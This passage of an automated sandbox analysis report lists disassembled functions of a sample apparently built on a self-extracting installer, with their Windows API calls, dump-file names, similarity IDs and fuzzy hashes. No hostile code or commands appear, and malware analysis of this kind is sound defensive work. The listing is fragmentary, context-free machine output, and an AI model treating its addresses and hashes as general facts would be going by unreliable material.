                                                                                                                                                                                                                                                  • Part of subcall function 00401F9D: GetLastError.KERNEL32(00000000,00000020,?), ref: 00401FEC
                                                                                                                                                                                                                                                  • Part of subcall function 00401F9D: wsprintfW.USER32 ref: 00401FFD
                                                                                                                                                                                                                                                  • Part of subcall function 00401F9D: GetEnvironmentVariableW.KERNEL32(?,00000000,00000000), ref: 00402012
                                                                                                                                                                                                                                                  • Part of subcall function 00401F9D: GetLastError.KERNEL32 ref: 00402017
                                                                                                                                                                                                                                                  • Part of subcall function 00401F9D: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 00402032
                                                                                                                                                                                                                                                  • Part of subcall function 00401F9D: GetEnvironmentVariableW.KERNEL32(?,00000000,?), ref: 00402045
                                                                                                                                                                                                                                                  • Part of subcall function 00401F9D: GetLastError.KERNEL32 ref: 0040204C
                                                                                                                                                                                                                                                  • Part of subcall function 00401F9D: lstrcmpiW.KERNEL32(00000000,00000020), ref: 00402061
                                                                                                                                                                                                                                                  • Part of subcall function 00401F9D: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00402071
                                                                                                                                                                                                                                                  • Part of subcall function 00401F9D: SetLastError.KERNEL32(00000000), ref: 00402098
                                                                                                                                                                                                                                                  • Part of subcall function 00401F9D: lstrlenA.KERNEL32(00413FD0), ref: 004020CC
                                                                                                                                                                                                                                                  • Part of subcall function 00401F9D: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 004020E7
                                                                                                                                                                                                                                                  • Part of subcall function 00401F9D: GetLocaleInfoW.KERNEL32(?,00001004,?,0000001F), ref: 00402119
                                                                                                                                                                                                                                                • _wtol.MSVCRT ref: 004047DC
                                                                                                                                                                                                                                                • _wtol.MSVCRT ref: 004047F8
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2343634378.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343617472.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343656545.0000000000413000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343678151.0000000000417000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.000000000041A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.0000000000432000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_TCUINOVJ.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ErrorLast$??2@EnvironmentVariable_wtollstrcmpi$??3@InfoLocalelstrlenwsprintf
                                                                                                                                                                                                                                                • String ID: CancelPrompt$ErrorTitle$ExtractCancelText$ExtractDialogText$ExtractDialogWidth$ExtractPathText$ExtractPathTitle$ExtractPathWidth$ExtractTitle$GUIFlags$GUIMode$MiscFlags$OverwriteMode$Progress$Title$WarningTitle$|wA
                                                                                                                                                                                                                                                • API String ID: 2725485552-3187639848
                                                                                                                                                                                                                                                • Opcode ID: 7a70c90a09e6339ceb99db9b5511794fba0efbdd365b8bdd8dc3dc4b6a1705ac
                                                                                                                                                                                                                                                • Instruction ID: a5d789275b7dd46d140941e9fd319bf554fc7ea6ad5da08365fcb0f0a182a74d
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7a70c90a09e6339ceb99db9b5511794fba0efbdd365b8bdd8dc3dc4b6a1705ac
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4251B5F1A402047EDB10BB619D86EFF36ACDA85308B64443BF904F32C1E6BC5E854A6D
                                                                                                                                                                                                                                                Function 00402DC0 Relevance: 35.1, APIs: 16, Strings: 4, Instructions: 123windowlibrarystringCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetClassNameA.USER32(?,?,00000040), ref: 00402DD3
                                                                                                                                                                                                                                                • lstrcmpiA.KERNEL32(?,STATIC), ref: 00402DE6
                                                                                                                                                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00402DF3
                                                                                                                                                                                                                                                  • Part of subcall function 00402D7D: GetWindowTextLengthW.USER32(?), ref: 00402D8E
                                                                                                                                                                                                                                                  • Part of subcall function 00402D7D: GetWindowTextW.USER32(00402E07,00000000,00000001), ref: 00402DAB
                                                                                                                                                                                                                                                  • Part of subcall function 00401A85: CharUpperW.USER32(?,7591E0B0,00000000,00000000,?,?,?,00403DBD,00000002), ref: 00401AC3
                                                                                                                                                                                                                                                  • Part of subcall function 00401A85: CharUpperW.USER32(?,?,?,?,00403DBD,00000002), ref: 00401ACF
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?), ref: 00402E20
                                                                                                                                                                                                                                                • GetParent.USER32(?), ref: 00402E2E
                                                                                                                                                                                                                                                • LoadLibraryA.KERNEL32(riched20), ref: 00402E42
                                                                                                                                                                                                                                                • GetMenu.USER32(?), ref: 00402E55
                                                                                                                                                                                                                                                • SetThreadLocale.KERNEL32(00000419), ref: 00402E62
                                                                                                                                                                                                                                                • CreateWindowExW.USER32(00000000,RichEdit20W,0041335C,50000804,?,?,?,?,?,00000000,00000000,00000000), ref: 00402E92
                                                                                                                                                                                                                                                • DestroyWindow.USER32(?), ref: 00402EA3
                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000459,00000022,00000000), ref: 00402EB8
                                                                                                                                                                                                                                                • GetSysColor.USER32(0000000F), ref: 00402EBC
                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 00402ECA
                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000461,?,?), ref: 00402EF5
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?), ref: 00402EFA
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?), ref: 00402F02
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2343634378.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343617472.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343656545.0000000000413000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343678151.0000000000417000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.000000000041A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.0000000000432000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_TCUINOVJ.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Window$??3@MessageSend$CharTextUpper$ClassColorCreateDestroyLengthLibraryLoadLocaleLongMenuNameParentThreadlstrcmpi
                                                                                                                                                                                                                                                • String ID: RichEdit20W$STATIC$riched20${\rtf
                                                                                                                                                                                                                                                • API String ID: 1731037045-2281146334
                                                                                                                                                                                                                                                • Opcode ID: 2b38b22499d69b5ca28c01525db5cb238b78fd2564d1ef548c56061806c72a13
                                                                                                                                                                                                                                                • Instruction ID: c7c9ca1f65d7473fe19c29f8272bdbb18bb8b251efb89c9ee4785ec66c96c850
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2b38b22499d69b5ca28c01525db5cb238b78fd2564d1ef548c56061806c72a13
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FE316072A40119BFDB01AFA5DD49DEF7BBCEF08745F104036F601B21D1DA789A008B68
                                                                                                                                                                                                                                                Function 00401CC8 Relevance: 31.6, APIs: 21, Instructions: 121windowCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetWindowDC.USER32(00000000), ref: 00401CD4
                                                                                                                                                                                                                                                • GetDeviceCaps.GDI32(00000000,00000058), ref: 00401CE0
                                                                                                                                                                                                                                                • MulDiv.KERNEL32(00000000,00000064,00000060), ref: 00401CF9
                                                                                                                                                                                                                                                • GetObjectW.GDI32(?,00000018,?), ref: 00401D28
                                                                                                                                                                                                                                                • MulDiv.KERNEL32(?,00000003,00000002), ref: 00401D33
                                                                                                                                                                                                                                                • MulDiv.KERNEL32(?,00000003,00000002), ref: 00401D3D
                                                                                                                                                                                                                                                • CreateCompatibleDC.GDI32(?), ref: 00401D4B
                                                                                                                                                                                                                                                • CreateCompatibleDC.GDI32(?), ref: 00401D52
                                                                                                                                                                                                                                                • SelectObject.GDI32(00000000,?), ref: 00401D60
                                                                                                                                                                                                                                                • CreateCompatibleBitmap.GDI32(?,?,?), ref: 00401D6E
                                                                                                                                                                                                                                                • SelectObject.GDI32(00000000,00000000), ref: 00401D76
                                                                                                                                                                                                                                                • SetStretchBltMode.GDI32(00000000,00000004), ref: 00401D7E
                                                                                                                                                                                                                                                • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00CC0020), ref: 00401D9D
                                                                                                                                                                                                                                                • GetCurrentObject.GDI32(00000000,00000007), ref: 00401DA6
                                                                                                                                                                                                                                                • SelectObject.GDI32(00000000,?), ref: 00401DB3
                                                                                                                                                                                                                                                • SelectObject.GDI32(00000000,?), ref: 00401DB9
                                                                                                                                                                                                                                                • DeleteDC.GDI32(00000000), ref: 00401DC2
                                                                                                                                                                                                                                                • DeleteDC.GDI32(00000000), ref: 00401DC5
                                                                                                                                                                                                                                                • ReleaseDC.USER32(00000000,?), ref: 00401DCC
                                                                                                                                                                                                                                                • ReleaseDC.USER32(00000000,?), ref: 00401DDB
                                                                                                                                                                                                                                                • CopyImage.USER32(?,00000000,00000000,00000000,00000000), ref: 00401DE8
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2343634378.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343617472.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343656545.0000000000413000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343678151.0000000000417000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.000000000041A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.0000000000432000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_TCUINOVJ.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Object$Select$CompatibleCreate$DeleteReleaseStretch$BitmapCapsCopyCurrentDeviceImageModeWindow
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3462224810-0
                                                                                                                                                                                                                                                • Opcode ID: edcdae41b00ef410d3e7ba3ed19d3c131e86ad83f2f2f2d47359cb6bb3a71bdf
                                                                                                                                                                                                                                                • Instruction ID: 24730f8ff9b6a3f8d7f0600a39c6f646a54ca28d21b12e05547a6914d757f366
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: edcdae41b00ef410d3e7ba3ed19d3c131e86ad83f2f2f2d47359cb6bb3a71bdf
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 00313976D00208BBDF215FA19C48EEFBFBDEB48752F108066F604B21A0C6758A50EB64
                                                                                                                                                                                                                                                Function 00401DF3 Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 120windowcommemoryCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetClassNameA.USER32(?,?,00000040), ref: 00401E05
                                                                                                                                                                                                                                                • lstrcmpiA.KERNEL32(?,STATIC), ref: 00401E1C
                                                                                                                                                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00401E2F
                                                                                                                                                                                                                                                • GetMenu.USER32(?), ref: 00401E44
                                                                                                                                                                                                                                                  • Part of subcall function 00401BDF: GetModuleHandleW.KERNEL32(00000000), ref: 00401BEA
                                                                                                                                                                                                                                                  • Part of subcall function 00401BDF: FindResourceExA.KERNEL32(00000000,?,?,00000000), ref: 00401C07
                                                                                                                                                                                                                                                  • Part of subcall function 00401BDF: FindResourceExA.KERNEL32(00000000,?,?,00000409), ref: 00401C1B
                                                                                                                                                                                                                                                  • Part of subcall function 00401BDF: SizeofResource.KERNEL32(00000000,00000000), ref: 00401C2C
                                                                                                                                                                                                                                                  • Part of subcall function 00401BDF: LoadResource.KERNEL32(00000000,00000000), ref: 00401C36
                                                                                                                                                                                                                                                  • Part of subcall function 00401BDF: LockResource.KERNEL32(00000000), ref: 00401C41
                                                                                                                                                                                                                                                • GlobalAlloc.KERNEL32(00000040,00000010), ref: 00401E76
                                                                                                                                                                                                                                                • memcpy.MSVCRT(00000000,00000000,00000010), ref: 00401E83
                                                                                                                                                                                                                                                • CoInitialize.OLE32(00000000), ref: 00401E8C
                                                                                                                                                                                                                                                • CreateStreamOnHGlobal.OLE32(00000000,00000000,?), ref: 00401E98
                                                                                                                                                                                                                                                • OleLoadPicture.OLEAUT32(?,00000000,00000000,00414C14,?), ref: 00401EBD
                                                                                                                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 00401ECD
                                                                                                                                                                                                                                                  • Part of subcall function 00401CC8: GetWindowDC.USER32(00000000), ref: 00401CD4
                                                                                                                                                                                                                                                  • Part of subcall function 00401CC8: GetDeviceCaps.GDI32(00000000,00000058), ref: 00401CE0
                                                                                                                                                                                                                                                  • Part of subcall function 00401CC8: MulDiv.KERNEL32(00000000,00000064,00000060), ref: 00401CF9
                                                                                                                                                                                                                                                  • Part of subcall function 00401CC8: GetObjectW.GDI32(?,00000018,?), ref: 00401D28
                                                                                                                                                                                                                                                  • Part of subcall function 00401CC8: MulDiv.KERNEL32(?,00000003,00000002), ref: 00401D33
                                                                                                                                                                                                                                                  • Part of subcall function 00401CC8: MulDiv.KERNEL32(?,00000003,00000002), ref: 00401D3D
                                                                                                                                                                                                                                                  • Part of subcall function 00401CC8: CreateCompatibleDC.GDI32(?), ref: 00401D4B
                                                                                                                                                                                                                                                  • Part of subcall function 00401CC8: CreateCompatibleDC.GDI32(?), ref: 00401D52
                                                                                                                                                                                                                                                  • Part of subcall function 00401CC8: SelectObject.GDI32(00000000,?), ref: 00401D60
                                                                                                                                                                                                                                                  • Part of subcall function 00401CC8: CreateCompatibleBitmap.GDI32(?,?,?), ref: 00401D6E
                                                                                                                                                                                                                                                  • Part of subcall function 00401CC8: SelectObject.GDI32(00000000,00000000), ref: 00401D76
                                                                                                                                                                                                                                                  • Part of subcall function 00401CC8: SetStretchBltMode.GDI32(00000000,00000004), ref: 00401D7E
                                                                                                                                                                                                                                                  • Part of subcall function 00401CC8: StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00CC0020), ref: 00401D9D
                                                                                                                                                                                                                                                  • Part of subcall function 00401CC8: GetCurrentObject.GDI32(00000000,00000007), ref: 00401DA6
                                                                                                                                                                                                                                                  • Part of subcall function 00401CC8: SelectObject.GDI32(00000000,?), ref: 00401DB3
                                                                                                                                                                                                                                                  • Part of subcall function 00401CC8: SelectObject.GDI32(00000000,?), ref: 00401DB9
                                                                                                                                                                                                                                                  • Part of subcall function 00401CC8: DeleteDC.GDI32(00000000), ref: 00401DC2
                                                                                                                                                                                                                                                  • Part of subcall function 00401CC8: DeleteDC.GDI32(00000000), ref: 00401DC5
                                                                                                                                                                                                                                                  • Part of subcall function 00401CC8: ReleaseDC.USER32(00000000,?), ref: 00401DCC
                                                                                                                                                                                                                                                • GetObjectW.GDI32(00000000,00000018,?), ref: 00401EFF
                                                                                                                                                                                                                                                • SetWindowPos.USER32(00000010,00000000,00000000,00000000,?,?,00000006), ref: 00401F13
                                                                                                                                                                                                                                                • SendMessageW.USER32(00000010,00000172,00000000,?), ref: 00401F25
                                                                                                                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 00401F3A
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2343634378.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343617472.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343656545.0000000000413000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343678151.0000000000417000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.000000000041A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.0000000000432000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_TCUINOVJ.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Object$Resource$CreateGlobalSelect$CompatibleWindow$DeleteFindFreeLoadStretch$AllocBitmapCapsClassCurrentDeviceHandleInitializeLockLongMenuMessageModeModuleNamePictureReleaseSendSizeofStreamlstrcmpimemcpy
                                                                                                                                                                                                                                                • String ID: IMAGES$STATIC
                                                                                                                                                                                                                                                • API String ID: 4202116410-1168396491
                                                                                                                                                                                                                                                • Opcode ID: 352b3c5e08a174ec4a3ffb4ca519ce1611b0b6cc4168eadb64d38ca8f457be46
                                                                                                                                                                                                                                                • Instruction ID: 08c73d75f8249df6a552952f3d33af28cabbedea74541c6d0cfd8ce2793c0c4e
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 352b3c5e08a174ec4a3ffb4ca519ce1611b0b6cc4168eadb64d38ca8f457be46
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C7417C71A00218BFCB11DFA1DC49DEEBF7DEF08742B008076FA05A61A0DB758A41DB68
                                                                                                                                                                                                                                                Function 0040813D Relevance: 27.1, APIs: 18, Instructions: 147windowcomtimeCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                  • Part of subcall function 0040692C: GetDlgItem.USER32(?,?), ref: 00406939
                                                                                                                                                                                                                                                  • Part of subcall function 0040692C: ShowWindow.USER32(00000000,?), ref: 00406950
                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000004B8), ref: 0040816A
                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00408179
                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000004B5), ref: 004081C0
                                                                                                                                                                                                                                                • GetWindowLongW.USER32(00000000,000000F0), ref: 004081C5
                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000004B5), ref: 004081D5
                                                                                                                                                                                                                                                • SetWindowLongW.USER32(00000000), ref: 004081D8
                                                                                                                                                                                                                                                • GetSystemMenu.USER32(?,00000000,000004B4,00000000), ref: 004081FE
                                                                                                                                                                                                                                                • EnableMenuItem.USER32(00000000,0000F060,00000001), ref: 00408210
                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000004B4), ref: 0040821A
                                                                                                                                                                                                                                                • SetFocus.USER32(00000000), ref: 0040821D
                                                                                                                                                                                                                                                • SetTimer.USER32(?,00000001,00000000,00000000), ref: 0040824C
                                                                                                                                                                                                                                                • CoCreateInstance.OLE32(00414C34,00000000,00000001,00414808,00000000), ref: 00408277
                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,00000002), ref: 00408294
                                                                                                                                                                                                                                                • IsWindow.USER32(00000000), ref: 00408297
                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,00000002), ref: 004082A7
                                                                                                                                                                                                                                                • EnableWindow.USER32(00000000), ref: 004082AA
                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000004B5), ref: 004082BE
                                                                                                                                                                                                                                                • ShowWindow.USER32(00000000), ref: 004082C1
                                                                                                                                                                                                                                                  • Part of subcall function 00407134: GetDlgItem.USER32(?,000004B6), ref: 00407142
                                                                                                                                                                                                                                                  • Part of subcall function 00407B33: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00407B6D
                                                                                                                                                                                                                                                  • Part of subcall function 00407B33: GetDlgItem.USER32(?,000004B8), ref: 00407B8B
                                                                                                                                                                                                                                                  • Part of subcall function 00407B33: SendMessageW.USER32(00000000,00000402,00000000,00000000), ref: 00407B9D
                                                                                                                                                                                                                                                  • Part of subcall function 00407B33: wsprintfW.USER32 ref: 00407BBB
                                                                                                                                                                                                                                                  • Part of subcall function 00407B33: ??3@YAXPAX@Z.MSVCRT(?), ref: 00407C53
                                                                                                                                                                                                                                                  • Part of subcall function 00407D06: GetModuleHandleW.KERNEL32(00000000,00000065,000004B7,?,?,?,?,?,0040803E), ref: 00407D30
                                                                                                                                                                                                                                                  • Part of subcall function 00407D06: LoadIconW.USER32(00000000), ref: 00407D33
                                                                                                                                                                                                                                                  • Part of subcall function 00407D06: GetSystemMetrics.USER32(00000032), ref: 00407D43
                                                                                                                                                                                                                                                  • Part of subcall function 00407D06: GetSystemMetrics.USER32(00000031), ref: 00407D48
                                                                                                                                                                                                                                                  • Part of subcall function 00407D06: GetModuleHandleW.KERNEL32(00000000,00000065,00000001,00000000,?,?,?,?,?,0040803E), ref: 00407D51
                                                                                                                                                                                                                                                  • Part of subcall function 00407D06: LoadImageW.USER32(00000000), ref: 00407D54
                                                                                                                                                                                                                                                  • Part of subcall function 00407D06: SendMessageW.USER32(?,00000080,00000001,?), ref: 00407D79
                                                                                                                                                                                                                                                  • Part of subcall function 00407D06: SendMessageW.USER32(?,00000080,00000000,?), ref: 00407D89
                                                                                                                                                                                                                                                  • Part of subcall function 00407D06: GetWindow.USER32(?,00000005), ref: 00407E76
                                                                                                                                                                                                                                                  • Part of subcall function 00407D06: GetWindow.USER32(?,00000005), ref: 00407E92
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2343634378.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343617472.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343656545.0000000000413000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343678151.0000000000417000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.000000000041A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.0000000000432000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_TCUINOVJ.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Item$Window$MessageSend$System$EnableHandleLoadLongMenuMetricsModuleShow$??3@CreateFocusIconImageInstanceTimerUnothrow_t@std@@@__ehfuncinfo$??2@wsprintf
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 855516470-0
                                                                                                                                                                                                                                                • Opcode ID: f96aa9b93e1fd9714dbcbc8c2c582c1e46f74a713c41b2300bd45d2dcf84ac32
                                                                                                                                                                                                                                                • Instruction ID: 3ce0214ef3d03b0ee840dd4ab9c121ae631e901bc0d6870238ad5b6e85178a64
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f96aa9b93e1fd9714dbcbc8c2c582c1e46f74a713c41b2300bd45d2dcf84ac32
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 014174B0644748ABDA206F65DD49F5B7BADEB40B05F00847DF552A62E1CB79B800CA1C
                                                                                                                                                                                                                                                Function 00403093 Relevance: 26.5, APIs: 10, Strings: 5, Instructions: 244stringCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,hAA,00000000), ref: 004030F6
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00000000,hAA,00000000), ref: 004030FE
                                                                                                                                                                                                                                                • strncmp.MSVCRT ref: 004031F1
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,00000000), ref: 00403255
                                                                                                                                                                                                                                                • lstrcmpW.KERNEL32(?,SetEnvironment,00000000), ref: 00403273
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(0040414C,?), ref: 00403347
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2343634378.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343617472.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343656545.0000000000413000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343678151.0000000000417000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.000000000041A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.0000000000432000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_TCUINOVJ.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ??3@$lstrcmpstrncmp
                                                                                                                                                                                                                                                • String ID: GUIFlags$MiscFlags$SetEnvironment$hAA${\rtf
                                                                                                                                                                                                                                                • API String ID: 2881732429-172299233
                                                                                                                                                                                                                                                • Opcode ID: 436b0b5fdcd0fc7850317bda0c1040a654aafe726af0558e82b6743448b11ef5
                                                                                                                                                                                                                                                • Instruction ID: da55d09168dcf28f6e950782b6654b171f18f9ca5632fa18d2c46afc5d57570a
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 436b0b5fdcd0fc7850317bda0c1040a654aafe726af0558e82b6743448b11ef5
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 23819D31900218ABDF11DFA1CD55BEE7B78AF14305F1040ABE8017B2E6DB78AB05DB59
                                                                                                                                                                                                                                                Function 00406A47 Relevance: 24.3, APIs: 16, Instructions: 270COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000004B3), ref: 00406A69
                                                                                                                                                                                                                                                • GetWindowLongW.USER32(00000000,000000F0), ref: 00406A6E
                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000004B4), ref: 00406AA5
                                                                                                                                                                                                                                                • GetWindowLongW.USER32(00000000,000000F0), ref: 00406AAA
                                                                                                                                                                                                                                                • GetSystemMetrics.USER32(00000010), ref: 00406B0B
                                                                                                                                                                                                                                                • GetSystemMetrics.USER32(00000011), ref: 00406B11
                                                                                                                                                                                                                                                • GetSystemMetrics.USER32(00000008), ref: 00406B18
                                                                                                                                                                                                                                                • GetSystemMetrics.USER32(00000007), ref: 00406B1F
                                                                                                                                                                                                                                                • GetParent.USER32(?), ref: 00406B43
                                                                                                                                                                                                                                                • GetClientRect.USER32(00000000,?), ref: 00406B55
                                                                                                                                                                                                                                                • ClientToScreen.USER32(?,?), ref: 00406B68
                                                                                                                                                                                                                                                • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00406BCE
                                                                                                                                                                                                                                                • GetClientRect.USER32(?,?), ref: 00406C55
                                                                                                                                                                                                                                                • ClientToScreen.USER32(?,?), ref: 00406B71
                                                                                                                                                                                                                                                  • Part of subcall function 0040690F: GetDlgItem.USER32(?,?), ref: 0040691B
                                                                                                                                                                                                                                                • GetSystemMetrics.USER32(00000008), ref: 00406CD6
                                                                                                                                                                                                                                                • GetSystemMetrics.USER32(00000007), ref: 00406CDD
                                                                                                                                                                                                                                                  • Part of subcall function 00406A18: GetDlgItem.USER32(?,?), ref: 00406A36
                                                                                                                                                                                                                                                  • Part of subcall function 00406A18: SetWindowPos.USER32(00000000), ref: 00406A3D
